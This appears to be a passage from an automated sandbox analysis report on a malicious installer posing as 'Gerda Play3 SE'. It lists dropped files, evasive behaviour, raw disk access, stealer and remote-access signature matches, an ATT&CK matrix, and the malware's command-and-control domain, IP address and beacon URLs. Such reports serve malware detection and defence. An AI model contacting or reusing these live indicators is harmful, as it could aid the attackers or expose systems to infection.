        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\is-UG21C.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeFile created: C:\ProgramData\Eclipse IO Library 9.27.43\Eclipse IO Library 9.27.43.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02D6F7DA
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_0040254E StartServiceCtrlDispatcherA,3_2_0040254E
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,1_2_004241EC
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004241A4 IsIconic,SetActiveWindow,1_2_004241A4
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418394
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042286C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0042F2F0 IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow,1_2_0042F2F0
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004175A8 IsIconic,GetCapture,1_2_004175A8
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00417CDE IsIconic,SetWindowPos,1_2_00417CDE
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CE0
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00483E20 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_00483E20
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F128
        Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_00401B4B
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_02D6F8DE
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeWindow / User API: threadDelayed 3878Jump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeWindow / User API: threadDelayed 5987Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\is-N5JHT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\is-REN2E.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\uninstall\is-GKUSE.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\is-8SV2U.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\ssleay32.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\libssl-1_1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\is-3CJHL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\msvcr71.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\Qt5OpenGL.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\is-RDVP8.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\msvcp71.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\libeay32.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\is-UG21C.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5968
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-18358
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe TID: 4196Thread sleep count: 3878 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe TID: 4196Thread sleep time: -7756000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe TID: 7144Thread sleep count: 73 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe TID: 7144Thread sleep time: -4380000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe TID: 4196Thread sleep count: 5987 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe TID: 4196Thread sleep time: -11974000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00452AD4 FindFirstFileA,GetLastError,1_2_00452AD4
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004753C4 FindFirstFileA,FindNextFileA,FindClose,1_2_004753C4
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00464200 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464200
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0049877C FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_0049877C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004627F8 FindFirstFileA,FindNextFileA,FindClose,1_2_004627F8
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00463D84 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463D84
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B78
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeThread delayed: delay time: 60000Jump to behavior
        Source: gerdaplay3se.exe, 00000003.00000002.3369142149.0000000000798000.00000004.00000020.00020000.00000000.sdmp, gerdaplay3se.exe, 00000003.00000002.3369142149.0000000000884000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-6765
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeAPI call chain: ExitProcess graph end nodegraph_3-18360
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeAPI call chain: ExitProcess graph end nodegraph_3-19648
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D800FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02D800FE
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D800FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02D800FE
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00450334
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D6648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,3_2_02D6648B
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D79468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02D79468
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00478940 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478940
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0042EE28 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,1_2_0042EE28
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E0AC
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D6F792 cpuid 3_2_02D6F792
        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0040520C
        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_00405258
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: GetLocaleInfoA,1_2_00408578
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: GetLocaleInfoA,1_2_004085C4
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00458670 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_00458670
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00455644 GetUserNameA,1_2_00455644
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3371905613.0000000002721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: gerdaplay3se.exe PID: 4052, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3371905613.0000000002721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: gerdaplay3se.exe PID: 4052, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
        Native API
        1
        DLL Side-Loading
        1
        Exploitation for Privilege Escalation
        1
        Deobfuscate/Decode Files or Information
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        2
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter
        4
        Windows Service
        1
        DLL Side-Loading
        2
        Obfuscated Files or Information
        LSASS Memory1
        Account Discovery
        Remote Desktop ProtocolData from Removable Media2
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Service Execution
        1
        Bootkit
        1
        Access Token Manipulation
        2
        Software Packing
        Security Account Manager2
        File and Directory Discovery
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Standard Port
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook4
        Windows Service
        1
        DLL Side-Loading
        NTDS35
        System Information Discovery
        Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
        Process Injection
        1
        Masquerading
        LSA Secrets41
        Security Software Discovery
        SSHKeylogging112
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
        Virtualization/Sandbox Evasion
        Cached Domain Credentials1
        Process Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Access Token Manipulation
        DCSync21
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
        Process Injection
        Proc Filesystem11
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Bootkit
        /etc/passwd and /etc/shadow3
        System Owner/User Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
        Remote System Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
        System Network Configuration Discovery
        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe100%Joe Sandbox ML
        C:\ProgramData\Eclipse IO Library 9.27.43\Eclipse IO Library 9.27.43.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Gerda Play3 SE\Qt5OpenGL.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Gerda Play3 SE\is-3CJHL.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gerda Play3 SE\is-8SV2U.tmp5%ReversingLabs
        C:\Users\user\AppData\Local\Gerda Play3 SE\is-N5JHT.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gerda Play3 SE\is-RDVP8.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gerda Play3 SE\is-REN2E.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gerda Play3 SE\is-UG21C.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Gerda Play3 SE\libeay32.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Gerda Play3 SE\libssl-1_1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Gerda Play3 SE\msvcp71.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Gerda Play3 SE\msvcr71.dll (copy)5%ReversingLabs
        C:\Users\user\AppData\Local\Gerda Play3 SE\ssleay32.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_iscrypt.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_setup64.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_shfoldr.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.innosetup.com/0%URL Reputationsafe
        https://sectigo.com/CPS00%URL Reputationsafe
        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.thawte.com00%URL Reputationsafe
        http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
        https://www.certum.pl/CPS00%URL Reputationsafe
        http://www.openssl.org/support/faq.html0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
        http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
        http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
        https://www.openssl.org/H0%URL Reputationsafe
        http://www.remobjects.com/ps0%URL Reputationsafe
        http://www.openssl.org/f0%URL Reputationsafe
        http://www.certum.pl/CPS00%URL Reputationsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        ceyqbgr.net
        185.208.158.248
        truetrue
          unknown
          18.31.95.13.in-addr.arpa
          unknown
          unknownfalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://ceyqbgr.net/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf815c5ee949b32true
              unknown
              http://ceyqbgr.net/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971ftrue
                unknown
                ceyqbgr.nettrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.innosetup.com/file.tmp, file.tmp, 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-GKUSE.tmp.1.drfalse
                  • URL Reputation: safe
                  unknown
                  https://sectigo.com/CPS0is-UG21C.tmp.1.drfalse
                  • URL Reputation: safe
                  unknown
                  http://repository.certum.pl/ctnca.cer09is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.drfalse
                    unknown
                    http://repository.certum.pl/cscasha2.cer0is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.drfalse
                      unknown
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0is-UG21C.tmp.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://ocsp.sectigo.com0is-UG21C.tmp.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.certum.pl/ctnca.crl0kis-N5JHT.tmp.1.dr, is-REN2E.tmp.1.drfalse
                        unknown
                        http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUfile.exefalse
                          unknown
                          http://ocsp.thawte.com0is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.drfalse
                          • URL Reputation: safe
                          unknown
                          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#is-UG21C.tmp.1.drfalse
                          • URL Reputation: safe
                          unknown
                          http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinefile.exefalse
                            unknown
                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#is-UG21C.tmp.1.drfalse
                            • URL Reputation: safe
                            unknown
                            https://www.certum.pl/CPS0is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.drfalse
                            • URL Reputation: safe
                            unknown
                            http://crl.certum.pl/cscasha2.crl0qis-N5JHT.tmp.1.dr, is-REN2E.tmp.1.drfalse
                              unknown
                              http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948gerdaplay3se.exe, 00000003.00000002.3373409541.0000000003614000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://cscasha2.ocsp-certum.com04is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.drfalse
                                  unknown
                                  http://www.openssl.org/support/faq.htmlis-N5JHT.tmp.1.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tis-UG21C.tmp.1.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.remobjects.com/psUfile.exe, 00000000.00000003.2109779269.0000000002310000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109905265.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-GKUSE.tmp.1.drfalse
                                    unknown
                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yis-UG21C.tmp.1.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://crl.thawte.com/ThawteTimestampingCA.crl0is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82dgerdaplay3se.exe, 00000003.00000002.3369142149.0000000000866000.00000004.00000020.00020000.00000000.sdmp, gerdaplay3se.exe, 00000003.00000002.3369142149.0000000000845000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#is-UG21C.tmp.1.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://subca.ocsp-certum.com01is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.drfalse
                                        unknown
                                        https://www.openssl.org/His-UG21C.tmp.1.drfalse
                                        • URL Reputation: safe
                                        unknown
